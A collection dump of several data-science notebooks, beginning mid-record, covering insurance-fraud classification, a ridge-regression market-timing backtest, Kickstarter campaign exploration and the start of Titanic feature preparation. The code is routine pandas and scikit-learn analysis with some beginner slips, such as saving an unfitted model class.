insurance claim is fraudulent or not. \n#\n# \n#\n# Note: Use the link below to reach to your dataset. \n#\n#\n# Downlaod Files:\n# https://github.com/dsrscientist/Data-Science-ML-Capstone-Projects/blob/master/Automobile_insurance_fraud.csv\n\n# +\n#Importing required packages & libraries.\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# %matplotlib inline\nimport warnings\nwarnings.filterwarnings('ignore')\n# -\n\n#Loading the dataset\ndf=pd.read_csv(\"https://raw.githubusercontent.com/dsrscientist/Data-Science-ML-Capstone-Projects/master/Automobile_insurance_fraud.csv\") \n\n#printing the dataset\ndf\n\n#printing the dataset\ndf.shape\n\n# We can see there are 1000 rows and 40 columns in the dataset.\n\n#checking for null values\ndf.isna().sum()\n\n# We can see there are no null values in the data. That's some good news to proceed further.\n\n# checking the statistical details of dataset\ndf.describe()\n\n# Here we can see that the '_c39' column all has NaN values to we will drop it. We also see that there are null in collision_type, property_damage and police_report_available columns. So, we will fill them using appropriate method. \n\n# Dropping columns \ndf2=df.drop('_c39',axis=1,inplace=True)\n\n#checking the dataset after removing the '_c39' column\ndf\n\ndf.isna().sum()\n\n# Now, the dataset looks good! \n\n#checking unique values\ndf.nunique()\n\n# Here we can see a no. of columns that are not required for our prediction. So, we will consider dropping the columns. \n\n# +\n# dropping columns which are not necessary for prediction\n\nto_drop = ['policy_number','policy_bind_date','policy_state','insured_zip','incident_location','incident_date',\n 'incident_state','incident_city','insured_hobbies','auto_make','auto_model','auto_year']\n\ndf.drop(to_drop, inplace = True, axis = 1)\n# -\n\n#checking dataset after dropping columns\ndf.head()\n\n# +\n# checking for multicollinearity\n\nplt.figure(figsize = (18, 12))\n\ncorr = df.corr()\nmask = np.triu(np.ones_like(corr, dtype = bool))\n\nsns.heatmap(data = corr, mask = mask, annot = True, fmt = '.2g', linewidth = 1)\nplt.show()\n# -\n\n# From the above plot, we can see that there is high correlation between age and months_as_customer.We will drop the \"age\" column. Also there is high correlation between total_clam_amount, injury_claim, property_claim, vehicle_claim as total_claim_amount is the sum of all others. So, we will drop total_claim_amount column.\n\ndf.drop(columns = ['age', 'total_claim_amount'], inplace = True, axis = 1)\n\ndf.head()\n\n#checking details information of dataset\ndf.info()\n\n# Our data looks in good shape now. so, we may proceed further by seperating the feature and the target columns to prepare it for model building.\n\n# +\n# separating the feature and target columns\n\nX = df.drop('fraud_reported', axis = 1)\ny = df['fraud_reported']\n# -\n\n# extracting categorical columns\ncat_df = X.select_dtypes(include = ['object'])\n\ncat_df.head()\n\n# printing unique values of each column\nfor col in cat_df.columns:\n print(f\"{col}: \\n{cat_df[col].unique()}\\n\")\n\n# We can see that are certain cells that have ? instead of a value in the property_damage, police_report_available and collision_type column. we will replace it with a \"Not Known\"\n\n# this will replace \"?\" with \"Not known\"\ncat_df.replace(to_replace=\"?\",\n value=\"Not known\")\n\n# We will now use One Hot Encoder to encode these categorical columns.\n\n#Applying One Hot Encoder\ncat_df = pd.get_dummies(cat_df, drop_first = True)\n\n#printing head after encoding\ncat_df.head()\n\n# We will also extract the numerical data. \n\n# extracting the numerical columns\nnum_df = X.select_dtypes(include = ['int64'])\n\nnum_df.head()\n\n# combining the Numerical and Categorical dataframes to get the final dataset\nX = pd.concat([num_df, cat_df], axis = 1)\n\nX.head()\n\n# We will now visualize the data. \n\n# +\nplt.figure(figsize = (25, 20))\nplotnumber = 1\n\nfor col in X.columns:\n if plotnumber <= 24:\n ax = plt.subplot(5, 5, plotnumber)\n sns.distplot(X[col])\n plt.xlabel(col, fontsize = 15)\n \n plotnumber += 1\n \nplt.tight_layout()\nplt.show()\n# -\n\n# Data looks good, let's check for outliers.\n\n# +\nplt.figure(figsize = (20, 15))\nplotnumber = 1\n\nfor col in X.columns:\n if plotnumber <= 24:\n ax = plt.subplot(5, 5, plotnumber)\n sns.boxplot(X[col])\n plt.xlabel(col, fontsize = 15)\n \n plotnumber += 1\nplt.tight_layout()\nplt.show()\n# -\n\n# We do see that outliers are present in some numerical columns we will scale numerical columns later.\n\n# +\n# splitting data into training set and test set\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25)\n# -\n\nX_train.head()\n\nnum_df = X_train[['months_as_customer', 'policy_deductable', 'umbrella_limit',\n 'capital-gains', 'capital-loss', 'incident_hour_of_the_day',\n 'number_of_vehicles_involved', 'bodily_injuries', 'witnesses', 'injury_claim', 'property_claim',\n 'vehicle_claim']]\n\n# +\n# Scaling the numeric values in the dataset\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nscaled_data = scaler.fit_transform(num_df)\n# -\n\nscaled_num_df = pd.DataFrame(data = scaled_data, columns = num_df.columns, index = X_train.index)\nscaled_num_df.head()\n\nX_train.drop(columns = scaled_num_df.columns, inplace = True)\n\nX_train = pd.concat([scaled_num_df, X_train], axis = 1)\n\nX_train.head()\n\n# Now, our data is ready for model building. Let's get started. \n\n# +\nfrom sklearn.svm import SVC\n\nsvc = SVC()\nsvc.fit(X_train, y_train)\n\ny_pred = svc.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\nsvc_train_acc = accuracy_score(y_train, svc.predict(X_train))\nsvc_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Support Vector Classifier is : {svc_train_acc}\")\nprint(f\"Test accuracy of Support Vector Classifier is : {svc_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# SVC presents a training accuracy of 84% and testing accuracy of 76%.\n\n# +\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn = KNeighborsClassifier(n_neighbors = 30)\nknn.fit(X_train, y_train)\n\ny_pred = knn.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\nknn_train_acc = accuracy_score(y_train, knn.predict(X_train))\nknn_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of KNN is : {knn_train_acc}\")\nprint(f\"Test accuracy of KNN is : {knn_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# KNN presents a training accuracy of 76% and testing accuracy of 72%.\n\n# +\nfrom sklearn.tree import DecisionTreeClassifier\n\ndtc = DecisionTreeClassifier()\ndtc.fit(X_train, y_train)\n\ny_pred = dtc.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\ndtc_train_acc = accuracy_score(y_train, dtc.predict(X_train))\ndtc_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Decision Tree is : {dtc_train_acc}\")\nprint(f\"Test accuracy of Decision Tree is : {dtc_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n# +\n# hyper parameter tuning\n\nfrom sklearn.model_selection import GridSearchCV\n\ngrid_params = {\n 'criterion' : ['gini', 'entropy'],\n 'max_depth' : [3, 5, 7, 10],\n 'min_samples_split' : range(2, 10, 1),\n 'min_samples_leaf' : range(2, 10, 1)\n}\n\ngrid_search = GridSearchCV(dtc, grid_params, cv = 5, n_jobs = -1, verbose = 1)\ngrid_search.fit(X_train, y_train)\n\n# +\n# best parameters and best score\n\nprint(grid_search.best_params_)\nprint(grid_search.best_score_)\n\n# +\n# best estimator \n\ndtc = grid_search.best_estimator_\n\ny_pred = dtc.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\ndtc_train_acc = accuracy_score(y_train, dtc.predict(X_train))\ndtc_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Decision Tree is : {dtc_train_acc}\")\nprint(f\"Test accuracy of Decision Tree is : {dtc_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# Decision Tree Classifier presents a training accuracy of 81% while testing accuracy of 80%.\n\n# +\nfrom sklearn.ensemble import RandomForestClassifier\n\nrand_clf = RandomForestClassifier(criterion= 'entropy', max_depth= 10, max_features= 'sqrt', min_samples_leaf= 1, min_samples_split= 3, n_estimators= 140)\nrand_clf.fit(X_train, y_train)\n\ny_pred = rand_clf.predict(X_test)\n\n# +\n# accuracy_score, confusion_matrix and classification_report\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\nrand_clf_train_acc = accuracy_score(y_train, rand_clf.predict(X_train))\nrand_clf_test_acc = accuracy_score(y_test, y_pred)\n\nprint(f\"Training accuracy of Random Forest is : {rand_clf_train_acc}\")\nprint(f\"Test accuracy of Random Forest is : {rand_clf_test_acc}\")\n\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n# -\n\n# Random Forest Classifier presents a training accuracy of 96% while testing accuracy of only 70%.\n\n# +\nfrom sklearn.ensemble import GradientBoostingClassifier\n\ngb = GradientBoostingClassifier()\ngb.fit(X_train, y_train)\n\n# accuracy score, confusion matrix and classification report of gradient boosting classifier\n\ngb_acc = accuracy_score(y_test, gb.predict(X_test))\n\nprint(f\"Training Accuracy of Gradient Boosting Classifier is {accuracy_score(y_train, gb.predict(X_train))}\")\nprint(f\"Test Accuracy of Gradient Boosting Classifier is {gb_acc} \\n\")\n\nprint(f\"Confusion Matrix :- \\n{confusion_matrix(y_test, gb.predict(X_test))}\\n\")\nprint(f\"Classification Report :- \\n {classification_report(y_test, gb.predict(X_test))}\")\n# -\n\n# Gradient Boosting Classifier presents a training accuracy of 93% while testing accuracy of only 48%.\n\n# +\nmodels = pd.DataFrame({\n 'Model' : ['SVC', 'KNN', 'Decision Tree', 'Random Forest', 'Gradient Boost'],\n 'Score' : [svc_test_acc, knn_test_acc, dtc_test_acc, rand_clf_test_acc, gb_acc]\n})\n\n\nmodels.sort_values(by = 'Score', ascending = False)\n# -\n\n# Thus, the above data demonstrates the accuracy scores of predictive models. We can see that Decision Tree Classifier has the highest accuracy score. We will save it as our final model.\n\n# +\nfrom joblib import Parallel, delayed\nimport joblib\n\n#Saving the best model\njoblib.dump(DecisionTreeClassifier, 'Insurance_Fraud_Detection.pkl')\n# -\n\n# We can see that most predictions made by major models indicate that the insurance claims are not fraud but genuine. However, there are some cases where fruadulent claims have also been made.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Debanti14/Datatrained-Practice_Projects","sub_path":"Insurance Claims- Fraud Detection.ipynb","file_name":"Insurance Claims- Fraud Detection.ipynb","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"12768685527","text":"# # Timing backtest with learning\n\n# +\n#hide \n# %load_ext autoreload\n# %autoreload 2\n# %matplotlib inline\n\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\nimport os \nimport subprocess\nfrom IPython.display import Image, display\n\nfrom skfin.plot import line, bar\n# -\n\n# In previous sections, we studied the predictability of industry and stock returns in a long-short \"cash-neutral\" setting. In this section, we shift to the predictability of a single asset (ie. the \"market\" as the S\\&P 500 US index).\n\n# ## Timing the market\n\n# To evaluate the out-of-sample predictability of a variable, Welch-Goyal (2008) compare two regressions:\n#\n# - conditional regression (based on the predictor)\n# - unconditional regression (based on a rolling mean)\n# - the comparison between the two regression provides a test of whether the predictor has any value.\n#\n#\n# Intuition\n#\n# - “low\" prices relative to dividends forecast higher subsequent returns\n# - other ratios (earnings, book value, moving average of past prices instead of dividends) should also work\n# - expected returns vary over the business cycle and higher risk premium required to get people to hold stocks at the bottom of a recession: dividend-price ratios can be interpreted a state-variable capturing business cycle risk\n#\n# Critical view\n#\n# - are the in-sample results robust out-of-sample?\n#\n#\n# Data\n#\n# - dividend price ratio (“d/p\"): difference between the log of dividends and the log of prices\n# - dividend yield (“d/y\"): difference between the log of dividends and the log of lagged prices\n# - percent equity issuing (“equis\"): ratio of equity issuing activity as a fraction of total issuing equity\n\n#hide \ndisplay(Image(\"images/gw_1.png\", width=500))\n\n#hide \ndisplay(Image(\"images/gw_2.png\",width=700))\n\n# Welch-Goyal summary: very little predictability and the oil shock 1974 important in explaining results in the literature.\n\n#hide \ndisplay(Image(\"images/gw_3.png\", width=500))\n\n# Campbell-Thompson: impose “sign-restrictions\"\n#\n# - “in practice, an investor would not use a perverse coefficient but would likely conclude that the coefficient is zero, in effect imposing prior knowledge on the output of the regression\" (p. 1516)\n#\n# Sign restrictions\n#\n# - set the regression coefficient to zero whenever it has the \"wrong\" sign (different from the theoretically expected sign estimated over the sample)\n# - set the forecast equity premium to zero whenever it is negative\n\n# Summary: does dividend yield predict returns?\n#\n# - Yes: dividend yield is a strong predictor in the 1970s and 1980s (in-sample!)\n# - No: the relationship became weaker in 1990s\n# - No: the statistical evidence is much weaker when adjusting for fact that regressors highly persistent\n# - No: dividend yield is also weak predictor out-of-sample –and rarely better than a moving-average.\n#\n# Ways to improve predictability\n# - Impose restrictions on coefficients (Campbell and Thompson, 2005)\n\n# ## Data\n\n# The data provided by Amit Goyal on the S\\&P 500 is essentially identical to the one provided by Ken French.\n\nfrom skfin.datasets import load_ag_features, load_kf_returns\ndf = load_ag_features()[:'1999']\n\nret = load_kf_returns(filename='F-F_Research_Data_Factors')['Monthly'][:'1999']\n\ncorr_ = df[['CRSP_SPvw']].corrwith(ret.assign(Mkt = lambda x: x['Mkt-RF'] + x['RF'])['Mkt'])['CRSP_SPvw']\nprint(f'Correlation data Ken French/Amit Goyal:{corr_:.2f}')\n\nline({'Amit Goyal': df['CRSP_SPvw'], 'Ken French': ret.assign(Mkt = lambda x: x['Mkt-RF'] + x['RF'])['Mkt']/100}, cumsum=True)\n\n# ## Timing backtest\n\n# +\nfrom skfin.estimators import Ridge, RidgeCV\nfrom skfin.mv_estimators import TimingMeanVariance\n\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import TimeSeriesSplit\n\n# +\nstart_date = \"1945-01-01\"\ntest_size = 1\nparams = dict(max_train_size=36, test_size=test_size, gap=0)\nparams[\"n_splits\"] = 1 + len(ret[:'1999'].loc[start_date:]) // test_size\n\ncv = TimeSeriesSplit(**params)\n# -\n\ncols = ['D12', 'E12', 'b/m', 'tbl', 'AAA', 'BAA', 'lty', 'ntis', 'Rfree',\n 'infl', 'ltr', 'corpr', 'svar', 'csp']\nret_ = ret['Mkt-RF']\ntarget = ret_.values\nfeatures = df.loc[ret.index, cols].fillna(0).values\n\n# +\nm = make_pipeline(StandardScaler(), \n Ridge(), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n\n_h = []\nfor train, test in cv.split(ret): \n m.fit(features[train], target[train])\n _h += [m.predict(features[test])]\n \nidx = ret.index[np.concatenate([test for _, test in cv.split(ret)])]\nh = pd.Series(np.concatenate(_h), index=idx)\npnl = h.shift(1).mul(ret_).dropna()\nline(pnl, cumsum=True)\n# -\n\n# We can plot the holdings and in this case, we see that the positions vary significantly and that there is a significant positive `tilt` (defined as the exponential average over the positions with a 252-day halflife). \n\nline({'holding': h, 'tilt': h.ewm(halflife=252).mean()})\n\n# Decomposing the pnl attributed to the `tilt` and the `timing` (defined as the difference between the positions and the `tilt`), we see that both contribute -- although the `timing` pnl has a lower sharpe ratio. \n\nline({'ALL': pnl, \n 'tilt': h.ewm(halflife=252).mean().shift(1).mul(ret_).dropna(), \n 'timing': h.sub(h.ewm(halflife=252).mean()).shift(1).mul(ret_).dropna()}, cumsum=True)\n\n# In what follows, we use the `Backtester` clas with the timing pipeline. \n\n# +\nfrom skfin.backtesting import Backtester\nestimator = make_pipeline(StandardScaler(), \n Ridge(), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n\nm = Backtester(estimator=estimator, ret=ret_)\nm.train(features, target)\n\nh.equals(m.h_), pnl.equals(m.pnl_)\n# -\n\n# ## Other timing backtest statistics\n\ncoef = pd.DataFrame([m_.steps[1][1].coef_ for m_ in m.estimators_], columns=cols, index=m.h_.index)\nline(coef, title='Ridge coefficient')\n\nfrom skfin.metrics import sharpe_ratio\n\nsr = {i: m.h_.shift(1+i).mul(ret_).pipe(sharpe_ratio) for i in range(-10, 12)}\nbar(sr, baseline=0, sort=False, title='Lead-lag sharpe ratio')\n\npnls_ = {}\nfor c in cols + ['ALL']:\n features_ = df.loc[ret.index].drop(c, axis=1, errors='ignore').fillna(0).values\n pnls_[c] = Backtester(estimator=estimator, ret=ret_).train(features_, target).pnl_\nline(pnls_, cumsum=True, title='Feature off the top')\n\npnls_ = {}\nfor alpha in [.1, 1, 10, 100, 1000]: \n estimator_ = make_pipeline(StandardScaler(), \n Ridge(alpha=alpha), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n pnls_[alpha] = Backtester(estimator=estimator_, ret=ret_).train(features, target).pnl_\nline(pnls_, cumsum=True, title='Robustness: ridge alpha')\n\n# +\nestimator_ = make_pipeline(StandardScaler(), \n RidgeCV(alphas=[1, 10, 100, 1000]), \n TimingMeanVariance(a_min=-.25, a_max=.25))\n\nm_ = Backtester(estimator=estimator_, ret=ret_)\nm_.train(features, target)\nline({'ridge': m.pnl_, 'ridgeCV': m_.pnl_}, cumsum=True, title='Robustness: estimator')\n# -\n\n# The following graph shows the regularization paramter `alpha` estimated by cross-validation by the `RidgeCV` estimator. \n\nalpha = pd.Series([m_.steps[1][1].alpha_ for m_ in m_.estimators_], index=m_.h_.index)\nline(alpha, legend=False, title='RidgeCV alpha')\n","repo_name":"schampon/skfin","sub_path":"nbs/41_Timing_backtest_with_learning.ipynb","file_name":"41_Timing_backtest_with_learning.ipynb","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"687712532","text":"# + [markdown] _uuid=\"72dcbdf719252ad310c9296cd157cc1f2e36c677\"\n# # Exploration of Kickstarter Data (2010-2017) (Work in progress)\n\n# + [markdown] _uuid=\"0b20cea833fb1aa456c0bfcd6a027a7b8b1b3c23\"\n# [Mickaël Mouillé](https://www.kaggle.com/kemical) posted this dataset online. \n#\n# You can check out the dataset [here](https://www.kaggle.com/kemical/kickstarter-projects).\n\n# + [markdown] _uuid=\"ddef2473b24040a41b9dacd93104590d7a496a6f\"\n# ![kickstarter](https://webby-gallery-production.s3.amazonaws.com/uploads/asset/image/15962/3018000000130981_large.jpg)\n\n# + [markdown] _uuid=\"e7bdbd58725a1ba28e7cf8be1e89cd613d308ecb\"\n# ## Features\n\n# + [markdown] _uuid=\"98d879f5ca03f117fee40f1b862b05d333c447ff\"\n# We have 15 initial features:\n# * ID: internal kickstarter id\n# * name: name of project - A project is a finite work with a clear goal that you’d like to bring to life. Think albums, books, or films.\n# * category: category\n# * main_category: category of campaign\n# * currency: currency used to support\n# * deadline: deadline for crowdfunding\n# * goal: fundraising goal - The funding goal is the amount of money that a creator needs to complete their project.\n# * launched: date launched\n# * pledged: amount pledged by \"crowd\"\n# * state: Current condition the project is in\n# * backers: number of backers\n# * country: country pledged from\n# * usd pledged: Pledged amount in USD (conversion made by KS)\n# * usd_pledged_real: Pledged amount in USD (conversion made by fixer.io api)\n# * usd_goal_real: Goal amount in USD (conversion made by fixer.io api)\n\n# + [markdown] _uuid=\"0d340725172bd830d572b1d6cfdef267d69da52d\"\n# ## Initial Exploration\n\n# + _uuid=\"8f2839f25d086af736a60e9eeb907d3b93b6e0e5\" _cell_guid=\"b1076dfc-b9ad-4769-8c92-a6c4dae69d19\"\n# Import dependencies\nimport numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# + _cell_guid=\"79c7e3d0-c299-4dcb-8224-4455121ee9b0\" _uuid=\"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a\"\n# Load in dataset\nKAGGLE_DIR = '../input/'\n# There were some issues with the encoding so we manually set it to 'latin1'\ndf = pd.read_csv(KAGGLE_DIR + 'ks-projects-201801.csv', encoding='latin1', low_memory=False)\n\n# + _uuid=\"85178a73c54ca7a684553ae33c1177e3f4bdf3fa\"\ndisplay(df.shape)\n\n# + _uuid=\"58ca2b336f13b6273a1fa6b91cda5d5bee79ac89\"\nprint('First 5 rows:')\ndisplay(df.head())\n\nprint('Last 5 rows:')\ndisplay(df.tail())\n\n# + _uuid=\"808909fe16e955f5bf1dcbeb58a886b4acb2bde6\"\ndf.info()\n\n# + [markdown] _uuid=\"9f7dceac0f16787802f80e198eaf7b9c149bbaad\"\n# ## Missing Values\n\n# + [markdown] _uuid=\"b8d797256ac47791fbf8ec2b1bfebf134b4f22ba\"\n# Let's see how many missing values we have in our DataFrame\n\n# + _uuid=\"2a63be8edd21bf375afe40f06d794421f9edf2e9\"\npercent_missing = (df.isnull().sum() * 100 / len(df)).round(2)\nmissing_value_df = pd.DataFrame({'column_name': df.columns,\n 'percent_missing': percent_missing})\nmissing_value_df.sort_values('percent_missing', ascending=False, inplace=True)\nmissing_value_df\n\n# + [markdown] _uuid=\"e65a80c7bd46c6756b3a89dd829b113b491002a1\"\n# Fortunately, there are not many missing values. Let's see what kind of project contain missing values.\n\n# + _uuid=\"cee9084ad781048e17363dc7d850896085bd02cd\"\ndisplay(df[df['usd pledged'].isnull()].shape)\n# First 20 columns\ndf[df['usd pledged'].isnull()].head(20)\n\n# + [markdown] _uuid=\"2f5fd591c7f327ed08022c4234691fd5d41834ac\"\n# We can fill the missing values with the values from 'usd_plegded_real'. This should still give us reliable results.\n\n# + _uuid=\"0589eb0bb8e2344106d4f8e58aeec99c0272231b\"\ndf['usd pledged'].fillna(df['usd_pledged_real'], inplace=True)\n\n# + [markdown] _uuid=\"a24cbd6067cac73b593b780d9669d9cc22eb0cb6\"\n# It looks like 'usd pledged' and 'usd_pledged_real' are the same. Let's check if this is so.\n\n# + _uuid=\"65398743a8cd52e46924da013abc0fed4d7fc1c7\"\nduplication = df.duplicated(['usd pledged', 'usd_pledged_real'])\ndup_count = 0\nfor row in duplication:\n if row == True:\n dup_count += 1\n \n# Duplications percentage\nprint('Duplicates between USD Pledged and USD Pledged Real: {} %'.format(round(dup_count / len(df) * 100, 2)))\n\n# + [markdown] _uuid=\"4354d1724ac84ecbfb550faad3e7f350a8c33cad\"\n# So the two features have a lot of overlap, but are not exactly the same. Let's keep them in our dataset for now.\n\n# + [markdown] _uuid=\"e86bea97ea895f840e181f840f63ce59d0f06bda\"\n# ## EDA\n\n# + [markdown] _uuid=\"d9bd7520b975067d9faa7a805f8cbdf2d9b031ab\"\n# ### Most popular categories\n\n# + [markdown] _uuid=\"5489c87f81880cab4b733cd23444add8e4eb7976\"\n# The 'category' and 'main_category' features are distinct but have a lot of overlap. However, the 'category' feature is much more diverse. Both can be useful for our analysis.\n\n# + _uuid=\"ab63b7cd6809abd702d9d341cfa7178d2b306d62\"\nprint('Categories in category: ', df['category'].nunique())\ndf['category'].value_counts()[:20].plot(kind='barh')\n\n# + _uuid=\"d5c49c55ddbfe7853d2e2f2c713255700d8246fa\"\nprint('Categories in main_category: ', df['main_category'].nunique())\ndf['main_category'].value_counts().plot(kind='barh')\n\n# + [markdown] _uuid=\"b51c4ef50176905aefceb797a02456b942cb18e0\"\n# ### Countries\n\n# + [markdown] _uuid=\"71ee3f4dcd5989f48c12083d69f9cb3d02e8cda7\"\n# ![](https://www.nationsonline.org/gallery/Flags/Flags-of-the-World.jpg)\n\n# + [markdown] _uuid=\"e66b62cb3da15e70f97420048cd8c10ab32a12f3\"\n# It is clear to see that most Kickstarter campaigns in our dataset are from the United States or Great Britain.\n\n# + _uuid=\"76f1c71b27ca5ffc4cbc02201f1e14e315d8ff80\"\nprint('Number of unique countries: ', df['country'].nunique())\ndf['country'].value_counts()[:10].plot(kind='barh')\n\n# + [markdown] _uuid=\"8b00138da836c8bc5c7f61a80e36551f8299efe0\"\n# ### Money!\n\n# + _uuid=\"f87bd87037e0bc6729e0024255a1234c0481e13b\"\nprint('The average Kickstarter campaign has {} USD pledged, {} backers and a goal of {} USD.'.format(round(df['usd_pledged_real'].mean(), 2),\n int(df['backers'].mean()),\n round(df['goal'].mean(), 2)))\n\n# + _uuid=\"c3bf1b843d46b7501bf7f0df1f86608cc4ca5fed\"\ndf['discrepancy'] = df['goal'] - df['usd_pledged_real']\ndf['target_reached'] = df['discrepancy'] <= 0\n\ntarget_reached = df.loc[lambda df: df['target_reached'] == True]\ntarget_not_reached = df.loc[lambda df: df['target_reached'] == False]\ntarget_reached_perc = round(len(target_reached) / len(df) * 100, 2)\ntarget_not_reached_perc = round(len(target_not_reached) / len(df) * 100, 2)\n\nprint('Out of {} Kickstarter campaigns:\\n\\n{} % reached their target.'.format(len(df), \n target_reached_perc))\nprint('For the {} campaigns that reached their target,\\n\\\nthere was on average {} USD pledged more than the target.\\n'.format(len(target_reached), \n round(target_reached['usd_pledged_real'].mean(), 2)))\n\nprint('{} % of the campaigns did not reach their target.\\n\\\nFor the {} campaigns that did not reach their target,\\n\\\nthere was on average {} USD pledged less than the target.'.format(target_not_reached_perc, \n len(target_not_reached), \n round(target_not_reached['usd_pledged_real'].mean(), 2)))\n\n# + _uuid=\"8a86e0071bcbeb4a1dad6068b60063e672389a13\"\ndf['currency'].value_counts().plot(kind='barh')\n\n# + [markdown] _uuid=\"73e3447794a1282cf149b9ace6babff185399787\"\n# It should be obvious that there is a correlation between the countries and currencies used. \n\n# + [markdown] _uuid=\"5c76d7d5718b5e1910fa4ed21e242e120b974a97\"\n# ### States\n\n# + _uuid=\"cdaae8af0ea4243c377764f60ffb46bf645c3f3f\"\ndf['state'].value_counts().plot(kind='barh')\n\nperc_successful = len(df[df['state'] == 'successful']) / len(df) * 100\nperc_failed = len(df[df['state'] == 'failed']) / len(df) * 100\nperc_canceled = len(df[df['state'] == 'canceled']) / len(df) * 100\nperc_other = 100 - (perc_successful + perc_failed + perc_canceled)\n\nprint('{} % of campaigns were successful\\n\\\n{} % of campaigns failed\\n\\\n{} % of campaigns were canceled\\n\\\n{} % of campaigns belong to other categories'.format(round(perc_successful, 2), \n round(perc_failed, 2), \n round(perc_canceled, 2), \n round(perc_other, 2)))\n\n# + [markdown] _uuid=\"8a7a8a422d3e6aca9d46fb3916834aab224880e5\"\n# Note: There is a slight difference between campaigns that reached their target and what the data calls 'successful' campaigns. A campaigns can for example have reached its target but still be live. A campaign can also not reach its target but belong to a 'canceled' state.\n\n# + [markdown] _uuid=\"2c173e39885f0a7eb24cf4312e0cabab75fc5fa7\"\n# # Work in progress\n\n# + _uuid=\"1ad9ac867b9f924ef3da0d1898c393f759eab4d7\"\n##### Ideas for this Kernel ######\n# Correlations\n# Top Kickstarter campaigns (What do they have in common)\n# Categories that are cashing the most\n# Outlier analysis\n# Preparation for machine learning (one-hot encoding)\n# Predicting usd_pledged\n# Feature importance\n# Tree interpreter\n# Partial Dependence\n# Extrapolation\n# Confidence based on tree variance\n###################################\n\n","repo_name":"peppyguy/u-kaggle","sub_path":"src/data/dataset/exploration-of-kickstarter-data-work-in-progress.ipynb","file_name":"exploration-of-kickstarter-data-work-in-progress.ipynb","file_ext":"py","file_size_in_byte":9513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"25907353081","text":"import pandas as pd\nimport numpy as np\n\ndf_train=pd.read_csv('/Users/genie/Desktop/titanic/train.csv')\ndf_test=pd.read_csv('/Users/genie/Desktop/titanic/test.csv')\n\ndf_train[:5]\n\n# a) \n# True\n# True\n# True\n# False\n\ndf1=df_train[(df_train.Parch == 0)]\nlen(df1)/len(df_train)\n\ndf2=df_train[(df_train.SibSp != 0)]\nlen(df2)/len(df_train)\n\ndf3=df_train[(df_train.Fare >= 500)]\nlen(df3)/len(df_train)\n\ndf4=df_train[(df_train.Age >= 65)]\nlen(df4)/len(df_train)\n\n\n# b)\n\ndef fill_nas(df):\n df=df.drop(['PassengerId','Name','Ticket','Cabin'],axis=1)\n df['Embarked'] = df['Embarked'].fillna(df['Embarked'].mode()[0])\n df['Fare'] = df['Fare'].fillna(df['Fare'].median())\n df['Age'] = df.groupby(['Pclass', 'Sex'])['Age'].transform(lambda x: x.fillna(x.median()))\n return(df)\n\n\ndf_train2=fill_nas(df_train)\ndf_train_poly=df_train2.copy()\ndf_train2[:5]\n\ndf_test2=fill_nas(df_test)\ndf_test_poly=df_test2.copy()\ndf_test2[:5]\n\n\n# c)\n\ndef data_prep(df):\n conditions = [\n (df['Age'] <= 16),\n (df['Age'] > 16) & (df['Age'] <= 32),\n (df['Age'] > 32) & (df['Age'] <= 48),\n (df['Age'] > 48) & (df['Age'] <= 64),\n (df['Age'] > 64) & (df['Age'] <= 100)\n ]\n values = ['1', '2', '3', '4', '5']\n df['AgeRange'] = np.select(conditions, values)\n conditions2 = [\n (df['Fare'] <= 7.9),\n (df['Fare'] > 7.9) & (df['Fare'] <= 14.5),\n (df['Fare'] > 14.5) & (df['Fare'] <= 31),\n (df['Fare'] > 31) & (df['Fare'] <= 600)\n ]\n values2 = ['1', '2', '3', '4']\n df['FareRange'] = np.select(conditions2, values2)\n df['Size']=df['SibSp']+df['Parch']\n df=df.drop(['SibSp','Parch','Age','Fare'],axis=1)\n df['Alone'] = np.where(df['Size'] == 0, 1, 0)\n print(df.dtypes)\n df=pd.get_dummies(df, columns = ['Sex','Embarked','AgeRange','FareRange'], drop_first=True)\n 